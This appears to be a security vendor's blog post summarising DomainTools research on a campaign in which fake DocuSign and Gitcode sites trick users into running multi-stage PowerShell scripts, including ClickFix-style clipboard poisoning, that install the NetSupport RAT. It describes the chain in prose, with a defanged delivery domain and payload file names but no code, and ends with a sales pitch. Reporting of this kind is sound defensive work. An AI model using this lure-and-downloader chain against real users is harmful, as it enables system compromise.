Cybersecurity experts are sounding the alarm on a new campaign utilizing deceptive websites, masquerading as legitimate platforms like DocuSign and Gitcode, to deploy the NetSupport RAT. This sophisticated attack chain leverages multi-stage PowerShell scripts, tricking users into executing malicious code that ultimately compromises their systems.

Deceptive Tactics Unveiled

Threat hunters from DomainTools Investigations (DTI) have uncovered a cunning scheme where malicious PowerShell scripts are hosted on fake Gitcode and DocuSign sites. These sites are designed to lure unsuspecting users into copying and running an initial PowerShell script. This script then downloads further malicious scripts, leading to the eventual installation of the NetSupport RAT.

• The initial PowerShell script downloads a second downloader script.

• This second script retrieves additional payloads.

• Ultimately, the NetSupport RAT is installed on the compromised machine.

The Multi-Stage Attack Flow

The attack unfolds through a series of carefully orchestrated steps:

1. Initial Lure: Users are directed to counterfeit DocuSign or Gitcode websites, likely via social engineering tactics like email or social media.

2. Script Execution (Gitcode): On fake Gitcode sites, users are prompted to run a PowerShell script that downloads intermediate scripts from an external server (e.g., "tradingviewtool[.]com"). These scripts sequentially launch the NetSupport RAT.

3. Clipboard Poisoning (DocuSign): Fake DocuSign sites employ a unique twist. They use ClickFix-style CAPTCHA verifications. Upon attempting to verify, an obfuscated PowerShell command is secretly copied to the user's clipboard. Users are then instructed to paste and execute this command in the Windows Run dialog.

4. Persistence and Payload Delivery: The executed PowerShell script downloads a persistence script ("wbdims.exe") from GitHub, ensuring the malware launches automatically upon login. This script then communicates with the delivery site, triggering the download of a second-stage PowerShell script. This second script subsequently downloads and executes a third-stage ZIP payload, which contains and runs "jp2launcher.exe," leading to the deployment of NetSupport RAT.

Evasion and Attribution

The multi-stage nature of this attack, involving scripts downloading and executing further scripts, is a deliberate tactic to evade detection and complicate security investigations. While the exact perpetrators remain unknown, DomainTools noted similarities in delivery URLs, domain naming, and registration patterns with a SocGholish (FakeUpdates) campaign from October 2024. It's important to note that NetSupport Manager is a legitimate administrative tool frequently abused by various threat groups, including FIN7, Scarlet Goldfinch, and Storm-0408.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack, The Hacker News.